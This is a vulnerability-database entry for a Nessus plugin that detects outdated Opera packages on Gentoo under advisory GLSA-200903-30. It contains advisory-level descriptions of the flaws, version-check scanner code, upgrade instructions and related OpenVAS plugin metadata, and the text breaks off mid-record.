ID GENTOO_GLSA-200903-30.NASL Type nessus Reporter This script is Copyright (C) 2009-2021 Tenable Network Security, Inc. Modified 2009-03-17T00:00:00
Description
The remote host is affected by the vulnerability described in GLSA-200903-30
(Opera: Multiple vulnerabilities)
Multiple vulnerabilities were discovered in Opera:
Vitaly McLain reported a heap-based buffer overflow when processing
host names in file:// URLs (CVE-2008-5178).
Alexios Fakos reported a vulnerability in the HTML parsing engine
when processing web pages that trigger an invalid pointer calculation
and heap corruption (CVE-2008-5679).
Red XIII reported that certain text-area contents can be
manipulated to cause a buffer overlow (CVE-2008-5680).
David Bloom discovered that unspecified 'scripted URLs' are not
blocked during the feed preview (CVE-2008-5681).
Robert Swiecki of the Google Security Team reported a Cross-site
scripting vulnerability (CVE-2008-5682).
An unspecified vulnerability reveals random data
(CVE-2008-5683).
Tavis Ormandy of the Google Security Team reported a vulnerability
when processing JPEG images that may corrupt memory
(CVE-2009-0914).
Impact :
A remote attacker could entice a user to open a specially crafted JPEG
image to cause a Denial of Service or execute arbitrary code, to
process an overly long file:// URL or to open a specially crafted web
page to execute arbitrary code. He could also read existing
subscriptions and force subscriptions to arbitrary feed URLs, as well
as inject arbitrary web script or HTML via built-in XSLT templates.
Workaround :
There is no known workaround at this time.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 200903-30.
#
# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(35943);
script_version("1.16");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
script_cve_id("CVE-2008-5178", "CVE-2008-5679", "CVE-2008-5680", "CVE-2008-5681", "CVE-2008-5682", "CVE-2008-5683", "CVE-2009-0914");
script_xref(name:"GLSA", value:"200903-30");
script_name(english:"GLSA-200903-30 : Opera: Multiple vulnerabilities");
script_summary(english:"Checks for updated package(s) in /var/db/pkg");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Gentoo host is missing one or more security-related
patches."
);
script_set_attribute(
attribute:"description",
value:
"The remote host is affected by the vulnerability described in GLSA-200903-30
(Opera: Multiple vulnerabilities)
Multiple vulnerabilities were discovered in Opera:
Vitaly McLain reported a heap-based buffer overflow when processing
host names in file:// URLs (CVE-2008-5178).
Alexios Fakos reported a vulnerability in the HTML parsing engine
when processing web pages that trigger an invalid pointer calculation
and heap corruption (CVE-2008-5679).
Red XIII reported that certain text-area contents can be
manipulated to cause a buffer overlow (CVE-2008-5680).
David Bloom discovered that unspecified 'scripted URLs' are not
blocked during the feed preview (CVE-2008-5681).
Robert Swiecki of the Google Security Team reported a Cross-site
scripting vulnerability (CVE-2008-5682).
An unspecified vulnerability reveals random data
(CVE-2008-5683).
Tavis Ormandy of the Google Security Team reported a vulnerability
when processing JPEG images that may corrupt memory
(CVE-2009-0914).
Impact :
A remote attacker could entice a user to open a specially crafted JPEG
image to cause a Denial of Service or execute arbitrary code, to
process an overly long file:// URL or to open a specially crafted web
page to execute arbitrary code. He could also read existing
subscriptions and force subscriptions to arbitrary feed URLs, as well
as inject arbitrary web script or HTML via built-in XSLT templates.
Workaround :
There is no known workaround at this time."
);
script_set_attribute(
attribute:"see_also",
value:"https://security.gentoo.org/glsa/200903-30"
);
script_set_attribute(
attribute:"solution",
value:
"All Opera users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose '>=www-client/opera-9.64'"
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');
script_cwe_id(79, 119, 200, 399);
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:opera");
script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
script_set_attribute(attribute:"patch_publication_date", value:"2009/03/16");
script_set_attribute(attribute:"plugin_publication_date", value:"2009/03/17");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.");
script_family(english:"Gentoo Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
flag = 0;
if (qpkg_check(package:"www-client/opera", unaffected:make_list("ge 9.64"), vulnerable:make_list("lt 9.64"))) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = qpkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "Opera");
}
{"id": "GENTOO_GLSA-200903-30.NASL", "bulletinFamily": "scanner", "title": "GLSA-200903-30 : Opera: Multiple vulnerabilities", "description": "The remote host is affected by the vulnerability described in GLSA-200903-30\n(Opera: Multiple vulnerabilities)\n\n Multiple vulnerabilities were discovered in Opera:\n Vitaly McLain reported a heap-based buffer overflow when processing\n host names in file:// URLs (CVE-2008-5178).\n Alexios Fakos reported a vulnerability in the HTML parsing engine\n when processing web pages that trigger an invalid pointer calculation\n and heap corruption (CVE-2008-5679).\n Red XIII reported that certain text-area contents can be\n manipulated to cause a buffer overlow (CVE-2008-5680).\n David Bloom discovered that unspecified 'scripted URLs' are not\n blocked during the feed preview (CVE-2008-5681).\n Robert Swiecki of the Google Security Team reported a Cross-site\n scripting vulnerability (CVE-2008-5682).\n An unspecified vulnerability reveals random data\n (CVE-2008-5683).\n Tavis Ormandy of the Google Security Team reported a vulnerability\n when processing JPEG images that may corrupt memory\n (CVE-2009-0914).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted JPEG\n image to cause a Denial of Service or execute arbitrary code, to\n process an overly long file:// URL or to open a specially crafted web\n page to execute arbitrary code. He could also read existing\n subscriptions and force subscriptions to arbitrary feed URLs, as well\n as inject arbitrary web script or HTML via built-in XSLT templates.\n \nWorkaround :\n\n There is no known workaround at this time.", "published": "2009-03-17T00:00:00", "modified": "2009-03-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/35943", "reporter": "This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.", "references": ["https://security.gentoo.org/glsa/200903-30"], "cvelist": ["CVE-2008-5680", "CVE-2008-5681", "CVE-2008-5679", "CVE-2008-5683", "CVE-2008-5682", "CVE-2008-5178", "CVE-2009-0914"], "type": "nessus", "lastseen": "2021-01-07T10:52:29", "edition": 26, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "gentoo", "idList": ["GLSA-200903-30"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900082", "OPENVAS:900082", "OPENVAS:63614", "OPENVAS:136141256231063614", "OPENVAS:800066", "OPENVAS:1361412562310900081", "OPENVAS:1361412562310800066", "OPENVAS:63044", "OPENVAS:63634", "OPENVAS:900081"]}, {"type": "cve", "idList": ["CVE-2009-0914", "CVE-2008-5679", "CVE-2008-5682", "CVE-2008-5178", "CVE-2008-5683", "CVE-2008-5680", "CVE-2008-5681"]}, {"type": "exploitdb", "idList": ["EDB-ID:7135"]}, {"type": "d2", "idList": ["D2SEC_OPERAHEAP"]}, {"type": "saint", "idList": ["SAINT:CBD9349B31AFF70B68118678A7F60371", "SAINT:8702592346709BB1DA31739DE1679D81", "SAINT:7BA284695A3EAA34108F9FE8A5E97F15"]}, {"type": "freebsd", "idList": ["225BC349-CE10-11DD-A721-0030843D3802", "8C5205B4-11A0-11DE-A964-0030843D3802"]}, {"type": "nessus", "idList": ["SUSE_11_0_OPERA-090317.NASL", "FREEBSD_PKG_8C5205B411A011DEA9640030843D3802.NASL", "SUSE_OPERA-6094.NASL", "FREEBSD_PKG_225BC349CE1011DDA7210030843D3802.NASL", "OPERA_963.NASL", "OPERA_964.NASL", "SUSE_11_1_OPERA-090317.NASL"]}], "modified": "2021-01-07T10:52:29", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-01-07T10:52:29", "rev": 2}, "vulnersScore": 7.7}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200903-30.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35943);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-5178\", \"CVE-2008-5679\", \"CVE-2008-5680\", \"CVE-2008-5681\", \"CVE-2008-5682\", \"CVE-2008-5683\", \"CVE-2009-0914\");\n script_xref(name:\"GLSA\", value:\"200903-30\");\n\n script_name(english:\"GLSA-200903-30 : Opera: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200903-30\n(Opera: Multiple vulnerabilities)\n\n Multiple vulnerabilities were discovered in Opera:\n Vitaly McLain reported a heap-based buffer overflow when processing\n host names in file:// URLs (CVE-2008-5178).\n Alexios Fakos reported a vulnerability in the HTML parsing engine\n when processing web pages that trigger an invalid pointer calculation\n and heap corruption (CVE-2008-5679).\n Red XIII reported that certain text-area contents can be\n manipulated to cause a buffer overlow (CVE-2008-5680).\n David Bloom discovered that unspecified 'scripted URLs' are not\n blocked during the feed preview (CVE-2008-5681).\n Robert Swiecki of the Google Security Team reported a Cross-site\n scripting vulnerability (CVE-2008-5682).\n An unspecified vulnerability reveals random data\n (CVE-2008-5683).\n Tavis Ormandy of the Google Security Team reported a vulnerability\n when processing JPEG images that may corrupt memory\n (CVE-2009-0914).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted JPEG\n image to cause a Denial of Service or execute arbitrary code, to\n process an overly long file:// URL or to open a specially crafted web\n page to execute arbitrary code. He could also read existing\n subscriptions and force subscriptions to arbitrary feed URLs, as well\n as inject arbitrary web script or HTML via built-in XSLT templates.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200903-30\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Opera users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/opera-9.64'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(79, 119, 200, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/opera\", unaffected:make_list(\"ge 9.64\"), vulnerable:make_list(\"lt 9.64\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Opera\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "35943", "cpe": ["p-cpe:/a:gentoo:linux:opera", "cpe:/o:gentoo:linux"], "scheme": null}
{"gentoo": [{"lastseen": "2016-09-06T19:46:48", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5680", "CVE-2008-5681", "CVE-2008-5679", "CVE-2008-5683", "CVE-2008-5682", "CVE-2008-5178", "CVE-2009-0914"], "edition": 1, "description": "### Background\n\nOpera is a fast web browser that is available free of charge. \n\n### Description\n\nMultiple vulnerabilities were discovered in Opera: \n\n * Vitaly McLain reported a heap-based buffer overflow when processing host names in file:// URLs (CVE-2008-5178).\n * Alexios Fakos reported a vulnerability in the HTML parsing engine when processing web pages that trigger an invalid pointer calculation and heap corruption (CVE-2008-5679).\n * Red XIII reported that certain text-area contents can be manipulated to cause a buffer overlow (CVE-2008-5680).\n * David Bloom discovered that unspecified \"scripted URLs\" are not blocked during the feed preview (CVE-2008-5681).\n * Robert Swiecki of the Google Security Team reported a Cross-site scripting vulnerability (CVE-2008-5682).\n * An unspecified vulnerability reveals random data (CVE-2008-5683).\n * Tavis Ormandy of the Google Security Team reported a vulnerability when processing JPEG images that may corrupt memory (CVE-2009-0914).\n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted JPEG image to cause a Denial of Service or execute arbitrary code, to process an overly long file:// URL or to open a specially crafted web page to execute arbitrary code. He could also read existing subscriptions and force subscriptions to arbitrary feed URLs, as well as inject arbitrary web script or HTML via built-in XSLT templates. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Opera users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/opera-9.64\"", "modified": "2009-03-17T00:00:00", "published": "2009-03-16T00:00:00", "id": "GLSA-200903-30", "href": "https://security.gentoo.org/glsa/200903-30", "type": "gentoo", "title": "Opera: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-04-06T11:37:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5680", "CVE-2008-5681", "CVE-2008-5679", "CVE-2008-5683", "CVE-2008-5682", "CVE-2008-5178", "CVE-2009-0914"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-30.", "modified": "2018-04-06T00:00:00", "published": "2009-03-20T00:00:00", "id": "OPENVAS:136141256231063614", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063614", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-30 (opera)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were found in Opera, the worst of which allow for\nthe execution of arbitrary code.\";\ntag_solution = \"All Opera users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/opera-9.64'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-30\nhttp://bugs.gentoo.org/show_bug.cgi?id=247229\nhttp://bugs.gentoo.org/show_bug.cgi?id=261032\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-30.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63614\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-20 00:52:38 +0100 (Fri, 20 Mar 2009)\");\n script_cve_id(\"CVE-2008-5178\", \"CVE-2008-5679\", \"CVE-2008-5680\", \"CVE-2008-5681\", \"CVE-2008-5682\", \"CVE-2008-5683\", \"CVE-2009-0914\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-30 (opera)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-client/opera\", unaffected: make_list(\"ge 9.64\"), vulnerable: make_list(\"lt 9.64\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5680", "CVE-2008-5681", "CVE-2008-5679", "CVE-2008-5683", "CVE-2008-5682", "CVE-2008-5178", "CVE-2009-0914"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-30.", "modified": "2017-07-07T00:00:00", "published": "2009-03-20T00:00:00", "id": "OPENVAS:63614", "href": "http://plugins.openvas.org/nasl.php?oid=63614", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-30 (opera)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were found in Opera, the worst of which allow for\nthe execution of arbitrary code.\";\ntag_solution = \"All Opera users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/opera-9.64'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-30\nhttp://bugs.gentoo.org/show_bug.cgi?id=247229\nhttp://bugs.gentoo.org/show_bug.cgi?id=261032\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-30.\";\n\n \n \n\nif(description)\n{\n script_id(63614);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-20 00:52:38 +0100 (Fri, 20 Mar 2009)\");\n script_cve_id(\"CVE-2008-5178\", \"CVE-2008-5679\", \"CVE-2008-5680\", \"CVE-2008-5681\", \"CVE-2008-5682\", \"CVE-2008-5683\", \"CVE-2009-0914\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-30 (opera)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-client/opera\", unaffected: make_list(\"ge 9.64\"), vulnerable: make_list(\"lt 9.64\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-19T10:49:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5680", "CVE-2008-5681", "CVE-2008-5679", "CVE-2008-5683", "CVE-2008-5682"], "description": "The host is installed with Opera web browser and is prone to\n multiple Vulnerabilities.", "modified": "2017-07-04T00:00:00", "published": "2008-12-26T00:00:00", "id": "OPENVAS:900081", "href": "http://plugins.openvas.org/nasl.php?oid=900081", "type": "openvas", "title": "Opera Web Browser Multiple Vulnerabilities - Dec08 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_opera_mult_vuln_dec08_win.nasl 6519 2017-07-04 14:08:14Z cfischer $\n#\n# Opera Web Browser Multiple Vulnerabilities - Dec08 (Windows)\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful remote attack could inject arbitrary code, information disclosure,\n execute java or plugin content and can even crash the application.\n Impact Level: Application\";\ntag_affected = \"Opera version prior to 9.63 on Windows.\";\ntag_insight = \"The flaws are due to\n - a buffer overflow error when handling certain text-area contents.\n - a memory corruption error when processing certain HTML constructs.\n - an input validation error in the feed preview feature when processing URLs.\n - an error in the built-in XSLT templates that incorrectly handle escaped\n content.\n - an error which could be exploited to reveal random data.\n - an error when processing SVG images embedded using img tags.\";\ntag_solution = \"Upgrade to Opera 9.63\n http://www.opera.com/download/\";\ntag_summary = \"The host is installed with Opera web browser and is prone to\n multiple Vulnerabilities.\";\n\nif(description)\n{\n script_id(900081);\n script_version(\"$Revision: 6519 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-04 16:08:14 +0200 (Tue, 04 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-12-26 14:23:17 +0100 (Fri, 26 Dec 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5679\", \"CVE-2008-5680\", \"CVE-2008-5681\",\n \"CVE-2008-5682\", \"CVE-2008-5683\");\n script_bugtraq_id(32864);\n script_name(\"Opera Web Browser Multiple Vulnerabilities - Dec08 (Windows)\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/support/kb/view/920/\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/support/kb/view/921/\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/support/kb/view/923/\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/support/kb/view/924/\");\n script_xref(name : \"URL\" , value : \"http://www.opera.com/docs/changelogs/windows/963/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_opera_detection_win_900036.nasl\");\n script_mandatory_keys(\"Opera/Win/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\noperaVer = get_kb_item(\"Opera/Win/Version\");\nif(!operaVer){\n exit(0);\n}\n\nif(version_is_less(version:operaVer, test_version:\"9.63\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-20T08:49:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5680", "CVE-2008-5681", "CVE-2008-5679", "CVE-2008-5683", "CVE-2008-5682"], "description": "The host is installed with Opera web browser and is prone to\n multiple Vulnerabilities.", "modified": "2017-07-05T00:00:00", "published": "2008-12-26T00:00:00", "id": "OPENVAS:900082", "href": "http://plugins.openvas.org/nasl.php?oid=900082", "type": "openvas", "title": "Opera Web Browser Multiple Vulnerabilities - Dec08 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_opera_mult_vuln_dec08_lin.nasl 6539 2017-07-05 12:02:14Z cfischer $\n#\n# Opera Web Browser Multiple Vulnerabilities - Dec08 (Linux)\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful remote attack could inject arbitrary code, information disclosure,\n execute java or plugin content and can even crash the application.\n Impact Level: Application\";\ntag_affected = \"Opera version prior to 9.63 on Linux.\";\ntag_insight = \"The flaws are due to\n - a buffer overflow error when handling certain text-area contents.\n - a memory corruption error when processing certain HTML constructs.\n - an input validation error in the feed preview feature when processing URLs.\n - an error in the built-in XSLT templates that incorrectly handle escaped\n content.\n - an error which could be exploited to reveal random data.\n - an error when processing SVG images embedded using img tags.\";\ntag_solution = 